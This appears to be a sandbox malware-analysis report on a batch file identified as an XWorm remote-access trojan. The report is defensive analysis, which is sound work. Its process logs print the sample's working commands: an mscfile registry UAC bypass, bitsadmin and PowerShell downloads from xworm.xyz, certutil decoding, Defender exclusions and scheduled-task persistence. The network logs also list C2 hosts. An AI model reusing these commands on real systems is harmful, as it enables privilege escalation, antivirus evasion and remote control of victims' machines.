Analysis Overview
SHA256
eb786df958af2453620d598b9f9baaf6d47470ee40260d9fa867a19c357cb3e8
Threat Level: Known bad
The file Uac Bypass Rat.bat was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Download via BitsAdmin
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Drops startup file
Deobfuscate/Decode Files or Information
Looks up external IP address via web service
Adds Run key to start application
Browser Information Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-27 22:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-27 22:31
Reported
2024-07-27 22:36
Platform
win7-20240708-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_CLASSES\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
Files
memory/1196-4-0x000007FEF5F9E000-0x000007FEF5F9F000-memory.dmp
memory/1196-5-0x000000001B530000-0x000000001B812000-memory.dmp
memory/1196-6-0x0000000002230000-0x0000000002238000-memory.dmp
memory/1196-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
memory/1196-8-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
memory/1196-9-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
memory/1196-10-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
memory/1196-11-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
memory/1196-12-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-27 22:31
Reported
2024-07-27 22:37
Platform
win10v2004-20240709-en
Max time kernel
300s
Max time network
307s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\certutil.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"
C:\Windows\system32\certutil.exe
certutil -decodehex temp.hex "Uni.exe"
C:\Users\Admin\AppData\Local\Temp\Uni.exe
Uni.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault366fb27chf519h4e2chb0d1h867cc4af018e
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff85ce846f8,0x7ff85ce84708,0x7ff85ce84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,9986061781726241866,1701752608151422325,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,9986061781726241866,1701752608151422325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,9986061781726241866,1701752608151422325,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulta62294c0hd9eah49ech98b0h9866e6f7e940
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff85ce846f8,0x7ff85ce84708,0x7ff85ce84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,11388953068434473861,6015015597198748488,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,11388953068434473861,6015015597198748488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,11388953068434473861,6015015597198748488,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | las-protected.gl.at.ply.gg | udp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| GB | 92.123.142.155:443 | www.bing.com | tcp |
| GB | 23.62.195.195:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | 155.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.195.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/2920-0-0x00007FF865303000-0x00007FF865305000-memory.dmp
memory/2920-1-0x000002C07C300000-0x000002C07C322000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwrwxubs.szz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2920-11-0x00007FF865300000-0x00007FF865DC1000-memory.dmp
memory/2920-12-0x00007FF865300000-0x00007FF865DC1000-memory.dmp
memory/2920-16-0x00007FF865300000-0x00007FF865DC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
| MD5 | 011e90b162cf67f34f91d6d563859817 |
| SHA1 | 30ce18995be9545ae88189bc3ff5defbd2392d11 |
| SHA256 | 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613 |
| SHA512 | 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d |
C:\Users\Admin\AppData\Local\Temp\temp.hex
| MD5 | fad3aaf3015914e834a9d0313fcd371b |
| SHA1 | a4715a153a79263436819905b87b54acae4b2227 |
| SHA256 | 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690 |
| SHA512 | 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a |
C:\Users\Admin\AppData\Local\Temp\Uni.exe
| MD5 | 09e870076cfaa16f20be5050834ba8ff |
| SHA1 | 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840 |
| SHA256 | f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4 |
| SHA512 | d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643 |
memory/668-24-0x00000000003C0000-0x00000000003D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98ca3263bd17f6f4308b8e4ff7530958 |
| SHA1 | 6f41bacd42af6a11bb8d1516f7b07171087e7a17 |
| SHA256 | d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19 |
| SHA512 | f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f2680d58214c3efd0a14ba0d70efebe5 |
| SHA1 | 52e0a1ad46a69fb3168cdc954d08faaff34ffd1b |
| SHA256 | 038481e9b0e68194376d698102a3a7f5c90c01f6738a4e23737f8e02c7775d13 |
| SHA512 | db3e4868378187991dbd6c70b03503a97c58ad20fb500b43b2e8497a137b050fdfa1a07a65f7cd64b4c93373196e93b332985fdb03975a69a8d832a0bd50aaf6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50d3033f2bc3a3774c469d03e71a79a9 |
| SHA1 | 22027b1d52085de99b3bffa276530fea5d961471 |
| SHA256 | 2987e99ec7fa17bd4ab7de3cb4dc62645e1052012a5a357904d6fc6db9054147 |
| SHA512 | ecf7ab1a9e4192454a3e24c60453fd702a8c648e00078fc933b9182f4a3d3c10c6f5da622a5729b35727e6ddc8837029caddcaf76f56e805b9744253b56da5d8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e5663972c1caaba7088048911c758bf3 |
| SHA1 | 3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198 |
| SHA256 | 9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e |
| SHA512 | ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc |
memory/1500-70-0x00000240A40E0000-0x00000240A4128000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 60ead4145eb78b972baf6c6270ae6d72 |
| SHA1 | e71f4507bea5b518d9ee9fb2d523c5a11adea842 |
| SHA256 | b9e99e7387a915275e8fe4ac0b0c0cd330b4632814d5c9c446beb2755f1309a7 |
| SHA512 | 8cdbafd2783048f5f54f22e13f6ef890936d5b986b0bb3fa86d2420a5bfecf7bedc56f46e6d5f126eae79f492315843c134c441084b912296e269f384a73ccde |
\??\pipe\LOCAL\crashpad_4876_MAJJQQJVPQFEHVWL
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d5bf46f54d5da837b514102015331281 |
| SHA1 | efd647e586dce6e2584c0ca22d2769d1a3c783dd |
| SHA256 | 3b663d91f235a652d304444ec461f449dc6bebfa46b2ed34f9907f9a8c5068d1 |
| SHA512 | e428be51f6480c975f70d3041283a601e18a886f1a9b45a526fc94f03ce38b90156c685508c41f2df08946eb040f031d36fcbb96ba565629058f5c149fcf057a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fda86bd3801453f51e3cf6ece483e691 |
| SHA1 | 10a08ac07916e750c553e48630aa734cdbfec018 |
| SHA256 | 02d18a8c2cac3b6b366d0f18b6864b3415e42d8bb6bd0e779a61a36b98c3655b |
| SHA512 | f9decc9e0c00ea25793249d1bfb2b281b2560d0a154610e4b1d891c69cf371b2faea00c4eb0fcbde5957c8cecf06a5946e1fd84a5451d18b268e5830f121c92c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1f9d180c0bcf71b48e7bc8302f85c28f |
| SHA1 | ade94a8e51c446383dc0a45edf5aad5fa20edf3c |
| SHA256 | a17d56c41d524453a78e3f06e0d0b0081e79d090a4b75d0b693ddbc39f6f7fdc |
| SHA512 | 282863df0e51288049587886ed37ad1cf5b6bfeed86454ea3b9f2bb7f0a1c591f3540c62712ebfcd6f1095e1977446dd5b13b904bb52b6d5c910a1efc208c785 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | b8f37fc2486561d4be9548700da16ba7 |
| SHA1 | be7025722c5158a0ac5a16b8c36993a9bdd869de |
| SHA256 | 0562c86cce9b2918ae6788e4255b27e5f66aacee72c608f8b2605801e007ca40 |
| SHA512 | de7a01fad74ede7ee3b88dd3c8c977e642d7f3cc3813f65c742a4802a512f24044c191b2df52b1e82f6ab7db97c73cbb9fe973f135a0f4b5658a8345170a5539 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 8d50de54c793792a90cc79f3bd1f5a50 |
| SHA1 | c3bbf0903e8d95434ba7dda22f4bac8c6014df8a |
| SHA256 | 6425f94df3b873d91a62d4531762926354604e67207124930293123179c98729 |
| SHA512 | e1b444261aeade264a1b06e766d0db6c00bdefc4abfb470447982713d8a76b727c19f51e5e2a8e0311abe51375f9b65c4b307adc7ac2045a5fbad167b25ae25e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
